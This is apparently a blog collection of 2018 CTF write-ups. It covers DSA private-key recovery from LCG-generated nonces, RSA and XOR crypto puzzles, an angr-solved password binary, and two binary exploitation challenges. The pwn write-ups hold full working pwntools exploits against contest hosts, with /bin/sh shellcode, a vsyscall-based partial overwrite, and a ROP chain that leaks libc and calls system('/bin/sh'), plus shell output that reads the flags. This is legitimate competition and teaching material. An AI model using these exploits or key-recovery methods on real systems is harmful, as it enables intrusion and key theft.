VolgaCTF Quals 2018 - Nonsense
The Task came with the description:
We've intercepted several consecutive signatures. Take everything you need and find the secret key. Send it to us in hex.
As well as a Python script:
import hashlib import gmpy2 import os from secret import x, seed class DSA(): def __init__(self): self.g = 88125476599184486094790650278890368754888757655708027167453919435240304366395317529470831972495061725782138055221217302201589783769854366885231779596493602609634987052252863192229681106120745605931395095346012008056087730365567429009621913663891364224332141824100071928803984724198563312854816667719924760795 self.y = 18433140630820275907539488836516835408779542939919052226997023049612786224410259583219376467254099629677919271852380455772458762645735404211432242965871926570632297310903219184400775850110990886397212284518923292433738871549404880989194321082225561448101852260505727288411231941413212099434438610673556403084 self.p = 89884656743115795425395461605176038709311877189759878663122975144592708970495081723016152663257074178905267744494172937616748015651504839967430700901664125135185879852143653824715409554960402343311756382635207838848036159350785779959423221882215217326708017212309285537596191495074550701770862125817284985959 self.q = 1118817215266473099401489299835945027713635248219 self.x = x def sign(self, m, k): h = int(hashlib.md5(m).hexdigest(), 16) r = pow(self.g, k, self.p) % self.q s = int(((self.x * r + h) * gmpy2.invert(k, self.q)) % self.q) return (r, s) def verify(self, m, r, s): if 0 < r and r < self.q and 0 < s and s < self.q: h = int(hashlib.md5(m).hexdigest(), 16) w = gmpy2.invert(s, self.q) u1 = (h * w) % self.q u2 = (r * w) % self.q v = ((pow(self.g, u1, self.p) * pow(self.y, u2, self.p)) % self.p) % self.q return v == r return None class LCG(): def __init__(self): self.a = 3437776292996777467976657547577967657547 self.b = 828669865469592426262363475477574643634 self.m = 1118817215266473099401489299835945027713635248219 self.seed = seed self.state = (self.a * self.seed + self.b) % self.m def next_number(self): self.state = (self.a * self.state + self.b) % self.m return self.state generator = LCG() signature = DSA() for _ in range(2): message = "VolgaCTF{" + os.urandom(16).encode('hex') + "}" k = generator.next_number() (r, s) = signature.sign(message, k) print (message, r, s) print signature.verify(message, r, s)
And a file with signatures:
('VolgaCTF{nKpV/dmkBeQ0n9Mz0g9eGQ==}', 1030409245884476193717141088285092765299686864672, 830067187231135666416948244755306407163838542785) ('VolgaCTF{KtetaQ4YT8PhTL3O4vsfDg==}', 403903893160663712713225718481237860747338118174, 803753330562964683180744246754284061126230157465) [...]
So the goal here is to recover the private key given signature pairs. The Python script creates a DSA signature of the given message using a secret private key x and a pseudo random exponent k that is created using a LCG.
Using LCGs in the sphere of IT security is almost always a very bad idea. Here it is as well.
The DSA signing step works as follows:
- Choose Random k
- Calculate
- Calculate
- The signature is (r, s)
For details of the parameters see the linked Wikipedia article.
So the signing step in DSA needs a random exponent k, if k can be guessed or calculated, you can recover the private key and break the crypto system.
Since an LCG is used to determine k, all ks in the signatures are related. In this case, if we have two signatures we can recover k by solving this system of equations (source):
The first two equation are given by the DSA algorithm. The third one shows the relation between two successive outputs of a LCG. In this task (that actually took me a while to see…) q and M are identical. Making this a an equation system with three equations and three unknowns.
We can calculate the secret by calculating:
and the “random” k with:
This Python script does the calculations for us:
from hashlib import md5 from sympy import invert as inv q = 1118817215266473099401489299835945027713635248219 a = 3437776292996777467976657547577967657547 b = 828669865469592426262363475477574643634 r1 = 1030409245884476193717141088285092765299686864672 r2 = 403903893160663712713225718481237860747338118174 s1 = 830067187231135666416948244755306407163838542785 s2 = 803753330562964683180744246754284061126230157465 m1 = int.from_bytes(md5(b"VolgaCTF{nKpV/dmkBeQ0n9Mz0g9eGQ==}").digest(), "big") m2 = int.from_bytes(md5(b"VolgaCTF{KtetaQ4YT8PhTL3O4vsfDg==}").digest(), "big") term1 = (inv(r1, q) * m1 - inv(r2, q) * (m2 - s2*b)) term2 = inv((s1 * inv(r1, q) - a * s2 * inv(r2, q)), q) k1 = (term1 * term2) % q x = (inv(r1, q) * (s1*k1 - m1)) % q print("VolgaCTF{" + hex(x)[2:].upper() + "}")
Giving us the flag
\o/ -
HarekazeCTF 2018 - 2 Easy Crypto Chals
The first HarakezeCTF came with some easy RSA based challenges. Since they were fun to do and a nice math refresher, I’m gonna document two of them briefly.
Round and Round
The first challenge came with two files, a Python script and a text file:
from Crypto.Util.number import * from Crypto.Random.random import randint import gmpy import key import binascii flag = key.FLAG FLAG = binascii.hexlify(flag) FLAG = int(FLAG.decode('utf-8'), 16) def gen_n(bits=1024): p = getStrongPrime(bits) q = getStrongPrime(bits) return p*q, p, q def main(): n, p, q = gen_n() e = (1<<16)+1 enc = pow(FLAG, e, n) p1 = (sum([pow(p-1, i, p) for i in range(q)])) q1 = (sum([pow(q-1, i, q) for i in range(p)])) print("enc =",enc) print("p1 =",p1) print("q1 =",q1) if __name__ == "__main__": main()
enc = 15507598298834817042463704681892573844935925207353671096676527782423920390858333417805014479686241766827314370902570869063203100704151010294869728739155779685640415815492312661653450808873691693721178331336833872996692091804443257630828512131569609704473214724551132715672202671586891813211353984388741035474991608860773895778988812691240069777435969326282770350038882767450912160134013566175657336041694882842590560100668789803775001750959648059363722039014522592751510672658328196379883088392541680852726136345115484827400366869810045573176782889745710174383221427352027041590910694360773085666697865554456816396551 p1 = 14606124773267989759790608461455191496412830491696356154942727371283685352374696106605522295947073718389291445222948819019827919548861779448943538887273671755720708995173224464135442610773913398114765000584117906488005860577777765761976598659759965848699728860137999472734199231263583504465555230926206555745572068651194660027408008664437845821585312159573051601404228506302601502000674242923654458940017954149007122396560597908895703129094329414813271877228441216708678152764783888299324278380566426363579192681667090193538271960774609959694372731502799584057204257039655016058403786035676376493785696595207371994520 q1 = 14606124773267989759790608461455191496412830491696356154942727371283685352374696106605522295947073718389291445222948819019827919548861779448943538887273671755720708995173224464135442610773913398114765000584117906488005860577777765761976598659759965848699728860137999472734199231263583504465555230926206555745568763680874120108583912617489933976894172558366109559645634758298286470207143481537561897150407972412540709976696855267154744423609260252738825337344339874487812781362826063927023814123654794249583090654283919689841700775405866650720124813397785666726161029434903581762204459888078943696756054152989895680616
So we’re given an RSA encrypted flag and two helper numbers and . The goal is to recover the two primes p and q to compute the inverse of e in (the private key) and decrypt the flag.
The helper numbers are build like this: , calculating works analogous.
An example with smaller primes shows how we can approach the problem of finding p and q. Assuming we use , if we write down the sum: we can see that the sum actually is: Meaning that and . Since q is odd (its prime, duh…), the series ends with an even exponent. So by subtracting one we get a multiple of p: The same of course also works for the other helper number: . Given those two equations we can calculate the primes p and q.
The exploit uses sympy’s equation solving abilities:
import sympy import binascii x = sympy.Symbol("x", integer=True) def xgcd(b, n): x0, x1, y0, y1 = 1, 0, 0, 1 while n != 0: q, b, n = b // n, n, b % n x0, x1 = x1, x0 - q * x1 y0, y1 = y1, y0 - q * y1 return b, x0, y0 enc = 15507598298834817042463704681892573844935925207353671096676527782423920390858333417805014479686241766827314370902570869063203100704151010294869728739155779685640415815492312661653450808873691693721178331336833872996692091804443257630828512131569609704473214724551132715672202671586891813211353984388741035474991608860773895778988812691240069777435969326282770350038882767450912160134013566175657336041694882842590560100668789803775001750959648059363722039014522592751510672658328196379883088392541680852726136345115484827400366869810045573176782889745710174383221427352027041590910694360773085666697865554456816396551 p1 = 14606124773267989759790608461455191496412830491696356154942727371283685352374696106605522295947073718389291445222948819019827919548861779448943538887273671755720708995173224464135442610773913398114765000584117906488005860577777765761976598659759965848699728860137999472734199231263583504465555230926206555745572068651194660027408008664437845821585312159573051601404228506302601502000674242923654458940017954149007122396560597908895703129094329414813271877228441216708678152764783888299324278380566426363579192681667090193538271960774609959694372731502799584057204257039655016058403786035676376493785696595207371994520 q1 = 14606124773267989759790608461455191496412830491696356154942727371283685352374696106605522295947073718389291445222948819019827919548861779448943538887273671755720708995173224464135442610773913398114765000584117906488005860577777765761976598659759965848699728860137999472734199231263583504465555230926206555745568763680874120108583912617489933976894172558366109559645634758298286470207143481537561897150407972412540709976696855267154744423609260252738825337344339874487812781362826063927023814123654794249583090654283919689841700775405866650720124813397785666726161029434903581762204459888078943696756054152989895680616 p1_l = p1 - 1 q1_l = q1 - 1 # we only care about the positive root p = int(sympy.solve((x * ((2*p1_l)/(x-1) - 1)) - 2*q1_l)[1]) q = int(sympy.solve((x * ((2*q1_l)/(x-1) - 1)) - 2*p1_l)[1]) N = p * q phi = (p-1)*(q-1) e = (1<<16)+1 _, x, _ = xgcd(e, phi) d = (x + phi) % phi # in case x is negative print("Found primes and inverse:") print("p: ", hex(p)) print("q: ", hex(q)) print("d: ", hex(d)) m = pow(enc, d, N) print(binascii.unhexlify(hex(m)[2:]))
Giving us the flag:
This challenge came with the Python script:
import random import base64 import key def xor(msg, key): return bytes([ch1^ch2 for ch1, ch2 in zip(msg, key)]) def gcd(x, y): while y != 0: r = x % y x = y y = r return x def gen_seed(n): seed = 0 for k in range(1,n): if gcd(k,n)==1: seed += 1 return seed s = 1 for p in b"Enjoy_HarekazeCTF!!": s *= p seed = gen_seed(s) random.seed(str(seed).rstrip("0")) flag = key.FLAG key = bytes([random.randint(0,255) for _ in flag]) enc = xor(flag, key) #7XDZk9F4ZI5WpcFOfej3Dbau3yc1kxUgqmRCPMkzgyYFGjsRJF9aMaLHyDU= print(base64.b64encode(enc).decode('utf-8'))
Since we are given the encryped flag in form of a comment and the script uses a stream cipher, we just need to run the script again with the base64 decoded version of the encrypted flag. The only problem is the calculation in the
function which would take waaay to long.The code:
seed = 0 for k in range(1,n): if gcd(k,n)==1: seed += 1 return seed
calculates the seed by counting the numbers coprime to n. Since n is given in the form of:
for p in b"Enjoy_HarekazeCTF!!": s *= p
which turns out to be 4529255040439033800342855653030016000. We can calculate the numbers coprime to this number by using eulers phi function which is fast for such a small number. The script:
import sympy.ntheory sympy.ntheory.totient(4529255040439033800342855653030016000)
gives us the seed 765753154007029226621575888896000000 in no time.
Embedded in the original script:
import random import base64 def xor(msg, key): return bytes([ch1^ch2 for ch1, ch2 in zip(msg, key)]) seed = 765753154007029226621575888896000000 random.seed(str(seed).rstrip("0")) key = bytes([random.randint(0,255) for _ in range(50)]) flag = base64.b64decode("7XDZk9F4ZI5WpcFOfej3Dbau3yc1kxUgqmRCPMkzgyYFGjsRJF9aMaLHyDU=") print(xor(flag, key))
gives us the flag
Harekaze CTF 2018 alnush
We had a x64 service wich allowed us to upload and execute shellcode. So far so good, but only alphanumeric shellcode was allowed. So just put in some premade code and we are done? Nah. It’s not that easy. The mempage where the shellcode gets executed later is marked as read and execute only, all of the alphanumeric shellcodes I found required it to be writeable as well so they can decode themselves. Now one could get the idea of jumping to mprotect first, and then perform further exploitation. I did not. I don’t even know if that was possible with the limited instructionset. In fact I solved the challenge without writing any alphanumeric shellcode at all, but by tricking the server into accepting (nearly) every shellcode.
If we look at the server it has a straightforward to spot bufferoverflow when entering shellcode. And there are also no stack canaries. So a simple ropchain? Sadly PIE was enabled. So the only chance we have is jumping to one position once by partially overwriting a ret pointer. For a better understanding a picture of the codeflow.
1 and 2 are the normal returns, ? is where I want to ret to, bypassing the strlen check on the shellcode input, effectively making it useless. For this to work I need to:
- get rax = 0 (or just small)
- fix the stack (so the local arguments match)
How can I do this without having anything reliable to return to? There is one last memory region without ASLR! The vsyscall table. And we can use it to pop off the stack AND to get rax = 0! For this to work at least rdi must point to a writeable address. In our case this condition was met. So all we need to do is:
- pop 4 qwords off the stack by repetitively returning into the vsyscall table
- overwrite the second ret address with one byte (0x4d).
- profit
As a bonus we even get a more reliable exploit as we only need to overwrite one byte and don’t have to mess with aslr at all. There is only one last restricion, as a strcpy like function was used to copy the shellcode onto the heap, nullbytes and newlines are forbidden characters. Acceptable constraints :)
from pwn import * r = remote("problem.harekaze.com", 20003) def pwn(): r.recvuntil("Enter shellcode >> ") sh = "\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb" \ "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" r.send(sh + "X" * (0x208 - len(sh)) + struct.pack("<Q", 0xffffffffff600000) * 4 + struct.pack("B", 0x4d)) r.interactive() if __name__ == '__main__': pwn()
and finally
[x] Opening connection to problem.harekaze.com on port 20003 [x] Opening connection to problem.harekaze.com on port 20003: Trying [+] Opening connection to problem.harekaze.com on port 20003: Done [*] Switching to interactive mode OK! $ whoami alnush $ ls /home/alnush/ alnush flag $ cat /home/alnush/flag HarekazeCTF{u_ex3cuted_alph4numeric_shellc0de!!!}
? Unintended solution? Was there a way to solve this challenge only using alphanumeric chars as well? Why was there an obvious overflow then? -
Codegate CTF 2018 Preliminary RedVelvet
This writeup describes how to solve the challenge with the help of angr. The challenge itself is a simple password input prompt wich outputs the flag afterwards.
As the disassembled code looked like it would be easily solveable by angr I just wrote a small script. From looking at the disassembled code we can tell angr
- where we want to go (right after passing all checks)
- what to avoid (exit calls)
- the needed length of the input string
Furthermore I patched out a useless ptrace call and filled it with nops. I don’t know if that was necessary, but it reduced complexity for angr (no need to emulate it).
import angr p = angr.Project('./RedVelvetPatch', load_options={"auto_load_libs": False}) st = p.factory.entry_state() # in printable range for _ in xrange(26): k = st.posix.files[0].read_from(1) st.solver.add(k >= 0x20) st.solver.add(k <= 0x7e) # Constrain the last byte to be a newline k = st.posix.files[0].read_from(1) st.solver.add(k == 10) # Reset the symbolic stdin's properties and set its length. st.posix.files[0].seek(0) st.posix.files[0].length = 27 sm = p.factory.simulation_manager(st) sm.explore(avoid=0x004007d0, find=0x0040152d) print(sm.found[0].posix.dumps(0))
After a few minutes we got
, but this is not the correct password / flag. Sometimes there are multiple solutions when dealing with constraint solvers. In such a case one can modify the contraints to exclude the unwanted solution. But I noticed that there is a md5sum check included in the binary as well, so I just wrote a Python script bruteforcing the last 6 characters as the rest looked pretty good. This took too much time so i just decided to bruteforce the “lc” and “la” part, assuming the “_” to be correct. I immediately got the flagWhat_You_Wanna_Be?:)_la_la
. -
Codegate CTF 2018 Preliminary BaskinRobins31
We were only provided with a x64 binary (no pic). It included an obvious overflow, allowing us to rop our way to the flag :) I could not find the used libc version (ok, i havent searched that hard), so I used pwnlibs DynELF Module. I wrote this writeup mainly to demonstrate the power of the DynELF Module in case you only have memory leaks at hand.
About the exploit there is not that much to say. We have
(for reading memory) andread
(for writing memory). At the end of every ropchain I jump back to theentrypoint
, effectively “restoring” the stack and allowing further exploitation. All gadgets were found with radares “/R/ …” utility.The plan is as follows:
- leak a pointer into libc by reading address at GOT (needed by DynELF)
- find out the address of system with the help of DynELF
- write “/bin/sh” into unused GOT space
- execute system(“/bin/sh”)
- profit
Now lean back and let DynELF do the work :D
from pwn import * r = remote("ch41l3ng3s.codegate.kr", 3131) def leakat(addr): ropchain = struct.pack("<QQ", 0x00400bc3, addr) # [pop rdi; ret;][addr] ropchain += struct.pack("<Q", 0x004006c0) # [puts] ropchain += struct.pack("<Q", 0x00400780) # entrypoint r.sendline("A" * 0xb8 + ropchain) r.recvuntil("Don't break the rules...:( \n") leak = r.recvuntil("###")[:-4] return leak + "\x00" def pwn(): libcptr = leakat(0x00602028) # points into got libcptr = libcptr + "\x00" * (8 - len(libcptr)) libcptr = struct.unpack("<Q", libcptr)[0] - 0xf6000 # subtract offset for speedup d = DynELF(leakat, libcptr) systemaddr = d.lookup('system') # write "/bin/sh\x00" to 0x006020b8 (writeable and unused address) log.info("writing \"/bin/sh\" into got") ropchain = struct.pack("<QQQQ", 0x0040087a, 0, 0x006020b8, 8) # [pop rdi; pop rsi; pop rdx; ret][stdin][rw@got][8] ropchain += struct.pack("<Q", 0x00400700) # [read] ropchain += struct.pack("<Q", 0x00400780) # entrypoint r.sendline("A" * 0xb8 + ropchain) r.send("/bin/sh\x00") r.recvuntil("Don't break the rules...:( \n") # triggering shell log.info("triggering system(\"/bin/sh\")") ropchain = struct.pack("<QQ", 0x00400bc3, 0x006020b8) # [pop rdi; ret;]["/bin/sh"] ropchain += struct.pack("<Q", systemaddr) # [system] r.sendline("A" * 0xb8 + ropchain) r.recvuntil("Don't break the rules...:( \n") r.interactive() if __name__ == '__main__': pwn()
In the end, there is profit of course.
[+] Opening connection to ch41l3ng3s.codegate.kr on port 3131: Done [!] No ELF provided. Leaking is much faster if you have a copy of the ELF being leaked. [+] Finding base address: 0x7fa507ba4000 [+] Resolving 'system': 0x7fa50818f000 [*] writing "/bin/sh" into got [*] triggering system("/bin/sh") [*] Switching to interactive mode $ whoami player $ ls BaskinRobins31 flag $ cat flag flag{The Korean name of "Puss in boots" is "My mom is an alien"}